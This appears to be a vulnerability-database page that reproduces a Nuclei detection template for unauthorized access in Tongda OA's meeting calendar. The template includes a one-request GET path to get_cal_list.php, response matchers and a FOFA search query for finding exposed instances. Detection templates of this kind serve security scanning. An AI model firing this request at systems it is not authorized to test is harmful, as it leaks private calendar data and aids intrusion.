tongda-meeting-unauth: Tongda OA Meeting - Unauthorized Access

日期: 2025-08-01 | 影响软件: Tongda OA Meeting | POC: 已公开

漏洞描述

Tongda Meeting Unauthorized Access were Detected.

PoC代码[已公开]

id: tongda-meeting-unauth

info:
  name: Tongda OA Meeting - Unauthorized Access
  author: SleepingBag945
  severity: medium
  description: |
    Tongda Meeting Unauthorized Access were Detected.
  reference:
    - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tongda2000
    product: office_anywhere
    fofa-query: app="TDXK-通达OA"
  tags: tongda,unauth,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200 && contains(header, 'application/json')
          - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":')
        condition: and
# digest: 4b0a00483046022100ff5d16bc50a293cb72e6a4b84c12adad0b68c022de9b905ad01f1754bf3f928f022100dab7dc2ebbe18faa38253f49a276711acfc1e468515e752ca2c59ffd9d530dd3:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐